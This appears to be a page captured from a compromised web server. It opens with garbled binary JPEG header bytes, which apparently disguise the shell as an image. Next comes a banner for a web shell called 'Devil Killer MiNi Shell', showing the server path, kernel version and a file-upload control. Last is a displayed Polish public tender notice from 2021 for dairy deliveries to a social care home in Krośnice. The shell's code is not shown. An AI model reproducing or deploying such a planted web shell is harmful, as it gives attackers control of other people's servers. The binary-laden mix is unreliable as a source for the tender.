JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211214/0031515801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Krośnicach w roku 2022 - nabiał </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 930655847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatowa</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krośnice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713846105</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">713846105</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dpskrosnice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://dpskrosnice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Krośnicach w roku 2022 - nabiał </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9e05f3eb-5cec-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00315158</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.milicz-powiat.pl/m,77,zamowienia-publiczne.html, https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ oraz ePUAPu, dostępnego<br/>pod adresem: https://epuap.gov.pl/wps/portal.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Sposób sporządzenia dokumentów elektronicznych musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z<br/>2020 poz. 2415). Ofertę, oświadczenia, podmiotowe środki dowodowe, pełnomocnictwa,zobowiązanie<br/>podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych<br/>formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt . Ofertę, a także<br/>oświadczenia o jakich mowa w SWZ składa się, pod rygorem nieważności,w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Wymagania techniczne<br/>i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów<br/>i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie<br/>korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany,wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a) Zamawiający oświadcza, że spełnia wymogi określone w<br/>rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi,<br/>b) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Sukcesywna<br/>dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Krośnicach w roku 2022”,<br/>c) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym<br/>zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a<br/>także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej,<br/>d) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4<br/>lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>e) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w załączniku nr 7 do<br/>SWZ,<br/>f) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel<br/>określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu<br/>innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim<br/>dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej<br/>wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO,<br/>g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do<br/>wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z<br/>udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane<br/>osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu<br/>w treści oferty lub dokumentów składanych na żądanie<br/>Zamawiającego,<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane<br/>wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w<br/>treści oferty lub dokumentów składanych na żądanie zamawiającego,<br/>h) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie<br/>uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w<br/>postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>załączniku nr 1 do SWZ → pkt. 8 lit b) – oświadczenia wykonawcy,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące<br/>wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX ustawy Pzp, do<br/>upływu terminu na ich wniesienie,<br/>- Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych<br/>ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz<br/>przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania<br/>osoby fizycznej lub danych dotyczących zdrowia,<br/>seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie<br/>zamówienia,<br/>- W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do<br/>uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące,<br/>prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji<br/>międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych<br/>osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia,<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16<br/>RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników,<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania,<br/>- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą<br/>przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS/AG-230/09/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Opis przedmiotu zamówienia dla zadania, którego przedmiotem jest sukcesywna dostawa artykułów spożywczych, do przygotowywania posiłków dla pensjonariuszy Domu Pomocy Społecznej w Krośnicach w roku 2022 w zakresie dostawy nabiału. Zakres przedmiotu zamówienia obejmuje sukcesywną dostawę nabiału. Szczegółowy zakres zamówienia określony jest przez Zamawiającego w wykazie asortymentowo-cenowym stanowiącym załącznik nr 2 do SWZ – nabiał.<br/>2. Zamawiający informuje, że ilości towarów określone w załączniku nr 2 do SWZ mają charakter szacunkowy i mogą ulec zmianie w zakresie i w okolicznościach wskazanych w umowie. Wykonawca nie ma prawa do roszczeń odszkodowawczych z tytułu niezrealizowania całości przedmiotu zamówienia. W ciągu okresu trwania umowy Zamawiający nie jest zobowiązany do wykorzystania całej szacunkowej ilości artykułów spożywczych przewidzianej w niniejszym postępowaniu. Z tytułu niewykorzystania całej szacunkowej ilości artykułów spożywczych Wykonawcy nie przysługuje żądanie zapłaty ani inne odszkodowanie.<br/>3. Miejsce dostawy: Dom Pomocy Społecznej w Miliczu, ul. Kombatantów 1, 56-300 Milicz.<br/>4. Dostawy każdego rodzaju asortymentu odbywać się będą na podstawie zamówień telefonicznych lub za pomocą poczty elektronicznej.<br/>5. Dostawa przedmiotu zamówienia odbywać się będzie z częstotliwością i w ilościach wynikających z bieżących potrzeb Zamawiającego, w terminach: nabiał – od poniedziałku do piątku w godz. 5:30 – 6:30.<br/>6. Towary lub produkty muszą być dostarczone w oryginalnych i nienaruszonych opakowaniach, nie później niż w połowie okresu przydatności do spożycia przewidzianego dla danego produktu lub towaru, spełniający warunki ilościowe i jakościowe wynikające z<br/>oferty. Dodatkowo dla mięsa i wyrobów mięsnych, mrożonek oraz nabiału produkty muszą spełniać wymogi systemu HACAP (GMP/GHP) (Dobrej Praktyki Higienicznej) oraz być dostarczane w sposób zapewniający utrzymanie ciągu chłodniczego i z monitorowaniem temperatury transportowanego towaru od Wykonawcy do Jednostki Zamawiającej, środkiem transportu posiadającym aktualną książkę kontroli sanitarnej.<br/>7. Wykonawca ponosi odpowiedzialność za odpowiednie zabezpieczenie towarów lub produktów na czas ich transportu. Za wady i braki powstałe w czasie transportu Wykonawca ponosi wszelkie skutki prawne.<br/>8. Wykonawca w ramach wynagrodzenia zapewni także rozładunek dostarczonych produktów lub towarów do miejsca wskazanego przez Zamawiającego.<br/>9. Wykonawca gwarantuje, że dostarczone produkty lub towary będą spełniać ustanowione polskim prawie normy, będą odpowiadały przepisom ustawy z 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia(tj. Dz. U. z 2020 poz. 2021 z późn. zm.) i aktów wykonawczych do tej ustawy oraz będą zgodne z przepisami ustawy z dnia 21 grudnia 2000 roku o jakości handlowej artykułów rolno-spożywczych (tj. Dz. U. z 2021r. poz.630),będą oznakowane zgodnie z wymaganiami Rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 23 grudnia 2014 roku w sprawie znakowania poszczególnych rodzajów środków spożywczych (Dz. U. z 2015 roku, poz. 29 z późn. zm.).<br/>10. Dostarczone towary lub produkty muszą być oznakowane w sposób zrozumiały, napisy w języku polskim muszą być wyraźne, czytelne i nieusuwalne, umieszczone w widocznym miejscu, w żaden sposób nie ukryte, zasłonięte czy przysłonięte innymi nadrukami czy obrazkami. Każdy asortyment produktów powinien być dostarczony w oddzielnym pojemniku. Nie dopuszcza się stosowania opakowań zastępczych oraz umieszczania reklam na opakowaniach. Towary lub produkty winny zawierać informacje takie jak: kto wyprodukował lub przetworzył, skład, datę ważności danego produktu, warunki przechowywania, atesty, jeśli dany produkt obowiązują.<br/>11. W przypadku, gdy przedmiotem dostawy są produkty lub towary zwierzęce, mięso i produkty mięsne, nabiał przez cały okres realizacji umowy Wykonawca musi posiadać:<br/>a. aktualną decyzję właściwego organu Inspekcji Weterynaryjnej lub Państwowej Inspekcji Sanitarnej dotyczącą możliwości produkcji lub obrotu danego produktu lub towaru będącego przedmiotem zamówienia,<br/>b. ważny dokument potwierdzający stosowanie systemu HACCP (certyfikat wydany przez niezależną, akredytowaną jednostkę certyfikującą lub zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub właściwego organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP, wydane na podstawie ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia lub protokół z kontroli sanitarnej przeprowadzonej przez organy Państwowej Inspekcji Sanitarnej jako organ urzędowej kontroli żywności, w skład którego wchodzi punkt zawierający pozytywną ocenę opracowania, wdrożenia i utrzymania systemu HACCP na podstawie ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia).<br/>Przedmiot zamówienia może pochodzić od podmiotów zakwalifikowanych przez organy urzędowej kontroli żywności (Inspekcja Weterynaryjna, Państwowa Inspekcja Sanitarna) do działalności marginalnej, lokalnej i ograniczonej.<br/>13. Dostarczony nabiał powinien być w opakowaniach, które nie mogą być uszkodzone ani zgniecione, wszelkie uszkodzenia spowodują nie przyjęcie towaru przez Zamawiającego. Cały asortyment nabiałowy powinien byś świeży, przywieziony w postaci schłodzonej, na opakowaniu widoczne termin przydatności do spożycia. Przedmiot zamówienia może pochodzić od podmiotów zakwalifikowanych przez cywilne organy urzędowej kontroli żywności (Inspekcja Weterynaryjna, Państwowa Inspekcja Sanitarna)<br/>do działalności marginalnej, lokalnej i ograniczonej.<br/>18. Wykonawca gwarantuje, że wytworzone i dostarczone towary spełniają wymagania obowiązujących krajowych i unijnych przepisów prawa żywnościowego, w szczególności:<br/>a. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tj Dz. U. z 2020, poz. 2021 z późn. zm.),<br/>b. ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (t.j. Dz. U. z 2020, poz.1753 z późn. zm.),<br/>c. ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. 2021 poz. 630 z późń. zm.),<br/>d. rozporządzenia (WE) Nr 178/2002 Parlamentu Europejskiego i Rady z dnia 28 stycznia 2002r. ustanawiającego ogólne zasady i wymagania prawa żywnościowego, powołującego Europejski Urząd ds. Bezpieczeństwa Żywności oraz ustanawiającego procedury w zakresie bezpieczeństwa żywności,<br/>e. rozporządzenia (WE) Nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych,<br/>f. rozporządzenia (WE) Nr 853/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004r. ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego,<br/>g. rozporządzenia (WE) Nr 1935/2004 Parlamentu Europejskiego i Rady z dnia 27 października2004 r. w sprawie materiałów przeznaczonych do kontaktu z żywnością oraz uchylające dyrektywy 80/590/EWG i 89/109/EWG,<br/>h. rozporządzenia Komisji (WE) Nr 1881/2006 z dnia 19 grudnia 2006 r. ustalającego najwyższe dopuszczalne poziomy niektórych zanieczyszczeń w środkach spożywczych,<br/>i. rozporządzenia Komisji (WE) Nr 2073/2005 z dnia 15 listopada 2005 r. w sprawie kryteriów mikrobiologicznych dotyczących środków spożywczych,<br/>j. rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 23 grudnia 2014r. w sprawie znakowania poszczególnych rodzajów środków spożywczych (Dz. U. z 2015r. poz. 29 z późn. zm.), k) rozporządzenia Ministra Zdrowia z dnia 6 czerwca 2007 r. w sprawie dostaw bezpośrednich środków spożywczych (Dz. U.2007.112.774). /jeżeli dotyczy.<br/>19. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru określają:<br/>a. opis przedmiotu zamówienia – formularz asortymentowo cenowy – stanowiący załącznik nr 2 do SWZ,<br/>b. projektowane postanowienia umowy – stanowiące załącznik nr 8 do SWZ.<br/>20. Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>21. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku, wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z jego opisem lub normami.<br/>22. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.<br/>23. Wymagana jest należyta staranność przy realizacji zobowiązań umowy. Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.<br/>34. Wspólny Słownik Zamówień (CPV): <br/>- CPV: 15500000-3 - Produkty mleczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt.<br/>7 i 8 p.z.p. – do 20 % wartości zamówienia podstawowego. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się<br/>następującymi kryteriami i odpowiadającymi im 